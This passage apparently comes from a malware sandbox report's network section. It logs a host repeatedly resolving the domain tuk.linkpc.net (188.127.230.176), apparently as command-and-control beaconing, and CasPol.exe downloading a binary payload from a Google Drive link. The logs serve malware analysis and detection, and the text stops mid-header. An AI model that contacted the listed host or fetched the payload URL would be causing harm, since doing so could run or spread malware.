Aug 5, 2022 11:36:36.018923044 CEST	192.168.11.20	1.1.1.1	0x9d66	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:41.969168901 CEST	192.168.11.20	1.1.1.1	0xc1f8	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:47.874558926 CEST	192.168.11.20	1.1.1.1	0xb30b	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:53.733606100 CEST	192.168.11.20	1.1.1.1	0x88aa	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:59.637025118 CEST	192.168.11.20	1.1.1.1	0x4d9f	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:05.588907003 CEST	192.168.11.20	1.1.1.1	0xeb9c	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:11.446918011 CEST	192.168.11.20	1.1.1.1	0xdbd3	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:17.351824045 CEST	192.168.11.20	1.1.1.1	0xa62	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:23.272507906 CEST	192.168.11.20	1.1.1.1	0xb57d	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:29.177437067 CEST	192.168.11.20	1.1.1.1	0x9000	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:35.129445076 CEST	192.168.11.20	1.1.1.1	0x9fc5	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:41.020170927 CEST	192.168.11.20	1.1.1.1	0x89ed	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:46.923991919 CEST	192.168.11.20	1.1.1.1	0x8b19	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:52.937983990 CEST	192.168.11.20	1.1.1.1	0x320e	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:58.844466925 CEST	192.168.11.20	1.1.1.1	0xf497	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:59.887749910 CEST	192.168.11.20	9.9.9.9	0xf497	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:59.892657042 CEST	192.168.11.20	1.1.1.1	0xc102	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:00.903049946 CEST	192.168.11.20	9.9.9.9	0xc102	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:04.921719074 CEST	192.168.11.20	1.1.1.1	0x31ed	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:10.871596098 CEST	192.168.11.20	1.1.1.1	0xe702	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:16.729809046 CEST	192.168.11.20	1.1.1.1	0x713c	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:22.790716887 CEST	192.168.11.20	1.1.1.1	0x6976	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:28.657541990 CEST	192.168.11.20	1.1.1.1	0x6d35	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:29.662511110 CEST	192.168.11.20	9.9.9.9	0x6d35	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:29.667045116 CEST	192.168.11.20	9.9.9.9	0x2554	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:33.678966045 CEST	192.168.11.20	1.1.1.1	0x458	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:39.646378040 CEST	192.168.11.20	1.1.1.1	0xadeb	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:45.598529100 CEST	192.168.11.20	1.1.1.1	0x136b	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:51.520092964 CEST	192.168.11.20	1.1.1.1	0xfb92	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:57.579916954 CEST	192.168.11.20	1.1.1.1	0xb123	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:03.438503027 CEST	192.168.11.20	1.1.1.1	0x12dd	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:04.451811075 CEST	192.168.11.20	9.9.9.9	0x12dd	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:04.457096100 CEST	192.168.11.20	9.9.9.9	0xab33	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:08.468300104 CEST	192.168.11.20	1.1.1.1	0x7dea	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:12.732745886 CEST	192.168.11.20	1.1.1.1	0xf28b	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:18.637866974 CEST	192.168.11.20	1.1.1.1	0xb1c9	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:19.651629925 CEST	192.168.11.20	9.9.9.9	0xb1c9	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:19.655885935 CEST	192.168.11.20	9.9.9.9	0x6e5e	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:23.668332100 CEST	192.168.11.20	1.1.1.1	0x3cd6	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:29.621148109 CEST	192.168.11.20	1.1.1.1	0x1997	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:35.587583065 CEST	192.168.11.20	1.1.1.1	0x6311	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:41.523385048 CEST	192.168.11.20	1.1.1.1	0x7848	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:47.383136034 CEST	192.168.11.20	1.1.1.1	0xcfc0	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:53.286617994 CEST	192.168.11.20	1.1.1.1	0xbe9c	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:59.238343954 CEST	192.168.11.20	1.1.1.1	0x5a9f	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:05.152400970 CEST	192.168.11.20	1.1.1.1	0x94e3	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:11.032572031 CEST	192.168.11.20	1.1.1.1	0x8b0f	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:17.031421900 CEST	192.168.11.20	1.1.1.1	0x9f2a	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:22.936971903 CEST	192.168.11.20	1.1.1.1	0x3a89	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:28.872673035 CEST	192.168.11.20	1.1.1.1	0x560c	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:34.779040098 CEST	192.168.11.20	1.1.1.1	0xd867	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:40.696635008 CEST	192.168.11.20	1.1.1.1	0x21cd	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 5, 2022 11:32:57.913872957 CEST	1.1.1.1	192.168.11.20	0x9683	No error (0)	drive.google.com		142.250.179.174	A (IP address)	IN (0x0001)
Aug 5, 2022 11:32:58.621520996 CEST	1.1.1.1	192.168.11.20	0x4393	No error (0)	doc-14-70-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Aug 5, 2022 11:32:58.621520996 CEST	1.1.1.1	192.168.11.20	0x4393	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.225	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:00.911015034 CEST	1.1.1.1	192.168.11.20	0x1f73	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:07.255804062 CEST	1.1.1.1	192.168.11.20	0xf897	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:13.717253923 CEST	1.1.1.1	192.168.11.20	0xabf9	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:20.131943941 CEST	1.1.1.1	192.168.11.20	0x9b46	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:26.716433048 CEST	1.1.1.1	192.168.11.20	0x3b18	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:33.256779909 CEST	1.1.1.1	192.168.11.20	0xa1f9	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:40.003887892 CEST	1.1.1.1	192.168.11.20	0xcc71	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:46.431785107 CEST	1.1.1.1	192.168.11.20	0x528c	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:52.688828945 CEST	1.1.1.1	192.168.11.20	0xfb82	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:59.289171934 CEST	1.1.1.1	192.168.11.20	0xa88d	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:06.200170040 CEST	1.1.1.1	192.168.11.20	0xd9f1	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:12.789232016 CEST	1.1.1.1	192.168.11.20	0x8241	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:18.797213078 CEST	1.1.1.1	192.168.11.20	0x1019	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:24.727416992 CEST	1.1.1.1	192.168.11.20	0x8688	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:30.586200953 CEST	1.1.1.1	192.168.11.20	0xfdb9	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:36.597254992 CEST	1.1.1.1	192.168.11.20	0xdf35	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:42.566190004 CEST	1.1.1.1	192.168.11.20	0x8511	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:48.410609007 CEST	1.1.1.1	192.168.11.20	0xacca	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:54.438241005 CEST	1.1.1.1	192.168.11.20	0x396b	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:58.689017057 CEST	1.1.1.1	192.168.11.20	0xe2b1	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:04.593795061 CEST	1.1.1.1	192.168.11.20	0x54c5	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:11.581832886 CEST	9.9.9.9	192.168.11.20	0xe796	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:11.708448887 CEST	1.1.1.1	192.168.11.20	0x259e	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:12.653842926 CEST	1.1.1.1	192.168.11.20	0xe796	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:17.614592075 CEST	1.1.1.1	192.168.11.20	0xc2bb	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:23.625874043 CEST	1.1.1.1	192.168.11.20	0xe7d3	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:29.640959978 CEST	1.1.1.1	192.168.11.20	0x3bda	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:35.540015936 CEST	1.1.1.1	192.168.11.20	0x1eab	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:41.444996119 CEST	1.1.1.1	192.168.11.20	0x95f6	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:47.397044897 CEST	1.1.1.1	192.168.11.20	0xbbd9	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:53.371336937 CEST	1.1.1.1	192.168.11.20	0x138c	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:59.284746885 CEST	1.1.1.1	192.168.11.20	0xd0ef	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:05.236743927 CEST	1.1.1.1	192.168.11.20	0x3ed6	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:11.243120909 CEST	1.1.1.1	192.168.11.20	0x6433	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:17.095899105 CEST	1.1.1.1	192.168.11.20	0x6fb3	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:23.173751116 CEST	1.1.1.1	192.168.11.20	0xeb6f	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:30.099138975 CEST	9.9.9.9	192.168.11.20	0x4342	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:30.684124947 CEST	1.1.1.1	192.168.11.20	0x4342	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:36.028650999 CEST	1.1.1.1	192.168.11.20	0x9d66	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:41.982587099 CEST	1.1.1.1	192.168.11.20	0xc1f8	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:47.884468079 CEST	1.1.1.1	192.168.11.20	0xb30b	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:53.743386984 CEST	1.1.1.1	192.168.11.20	0x88aa	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:59.646581888 CEST	1.1.1.1	192.168.11.20	0x4d9f	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:05.598385096 CEST	1.1.1.1	192.168.11.20	0xeb9c	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:11.456281900 CEST	1.1.1.1	192.168.11.20	0xdbd3	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:17.361181021 CEST	1.1.1.1	192.168.11.20	0xa62	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:23.283582926 CEST	1.1.1.1	192.168.11.20	0xb57d	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:29.186938047 CEST	1.1.1.1	192.168.11.20	0x9000	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:35.139229059 CEST	1.1.1.1	192.168.11.20	0x9fc5	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:41.029963017 CEST	1.1.1.1	192.168.11.20	0x89ed	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:47.040210009 CEST	1.1.1.1	192.168.11.20	0x8b19	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:52.947561026 CEST	1.1.1.1	192.168.11.20	0x320e	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:37:59.892019987 CEST	9.9.9.9	192.168.11.20	0xf497	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:00.464914083 CEST	1.1.1.1	192.168.11.20	0xf497	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:00.906367064 CEST	9.9.9.9	192.168.11.20	0xc102	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:02.018528938 CEST	1.1.1.1	192.168.11.20	0xc102	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:04.931158066 CEST	1.1.1.1	192.168.11.20	0x31ed	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:10.881320000 CEST	1.1.1.1	192.168.11.20	0xe702	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:16.854331017 CEST	1.1.1.1	192.168.11.20	0x713c	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:22.800626040 CEST	1.1.1.1	192.168.11.20	0x6976	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:29.666232109 CEST	9.9.9.9	192.168.11.20	0x6d35	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:29.670787096 CEST	9.9.9.9	192.168.11.20	0x2554	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:30.276550055 CEST	1.1.1.1	192.168.11.20	0x6d35	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:33.688431978 CEST	1.1.1.1	192.168.11.20	0x458	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:39.761596918 CEST	1.1.1.1	192.168.11.20	0xadeb	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:45.608515024 CEST	1.1.1.1	192.168.11.20	0x136b	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:51.646773100 CEST	1.1.1.1	192.168.11.20	0xfb92	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:38:57.589534044 CEST	1.1.1.1	192.168.11.20	0xb123	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:04.456307888 CEST	9.9.9.9	192.168.11.20	0x12dd	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:04.461613894 CEST	9.9.9.9	192.168.11.20	0xab33	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:05.056463957 CEST	1.1.1.1	192.168.11.20	0x12dd	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:08.477998972 CEST	1.1.1.1	192.168.11.20	0x7dea	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:12.741753101 CEST	1.1.1.1	192.168.11.20	0xf28b	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:19.655186892 CEST	9.9.9.9	192.168.11.20	0xb1c9	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:19.659593105 CEST	9.9.9.9	192.168.11.20	0x6e5e	Name error (3)	tuk.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:20.255547047 CEST	1.1.1.1	192.168.11.20	0xb1c9	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:23.677767992 CEST	1.1.1.1	192.168.11.20	0x3cd6	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:29.745368958 CEST	1.1.1.1	192.168.11.20	0x1997	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:35.597193003 CEST	1.1.1.1	192.168.11.20	0x6311	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:41.534070969 CEST	1.1.1.1	192.168.11.20	0x7848	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:47.392364979 CEST	1.1.1.1	192.168.11.20	0xcfc0	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:53.296116114 CEST	1.1.1.1	192.168.11.20	0xbe9c	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:39:59.248460054 CEST	1.1.1.1	192.168.11.20	0x5a9f	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:05.162075043 CEST	1.1.1.1	192.168.11.20	0x94e3	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:11.148859024 CEST	1.1.1.1	192.168.11.20	0x8b0f	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:17.041599989 CEST	1.1.1.1	192.168.11.20	0x9f2a	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:22.946896076 CEST	1.1.1.1	192.168.11.20	0x3a89	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:28.882746935 CEST	1.1.1.1	192.168.11.20	0x560c	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:34.789006948 CEST	1.1.1.1	192.168.11.20	0xd867	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)
Aug 5, 2022 11:40:40.812553883 CEST	1.1.1.1	192.168.11.20	0x21cd	No error (0)	tuk.linkpc.net		188.127.230.176	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-14-70-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49791	142.250.179.174	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-05 09:32:58 UTC	0	OUT	GET /uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-08-05 09:32:58 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 05 Aug 2022 09:32:58 GMT Location: https://doc-14-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie1disn24fvm7mb2d8jibr4j1v/1659691950000/06422039211485589527//1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r?e=download&uuid=fa4270ed-3082-4e6e-8e77-e38f9ee0c1fd Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Content-Security-Policy: script-src 'nonce-o6_yjWqPkGligajFWV2CfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version= Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49792	142.250.181.225	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-05 09:32:58 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie1disn24fvm7mb2d8jibr4j1v/1659691950000/06422039211485589527/*/1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r?e=download&uuid=fa4270ed-3082-4e6e-8e77-e38f9ee0c1fd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-70-docs.googleusercontent.com Connection: Keep-Alive
2022-08-05 09:32:58 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvAw9Z6TxvhP7VUw6R8jim-MdANv4VJy5KrQDLThbSSmPwFqTirQ3FiqncYvgwoct8Y_Pgn239ctkt0zMR0JtML7w Content-Type: application/octet-stream Content-Disposition: attachment; filename="xoxo nano_GhMgvwjlld45.bin"; filename=UTF-8''xoxo%20nano_GhMgvwjlld45.bin Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, 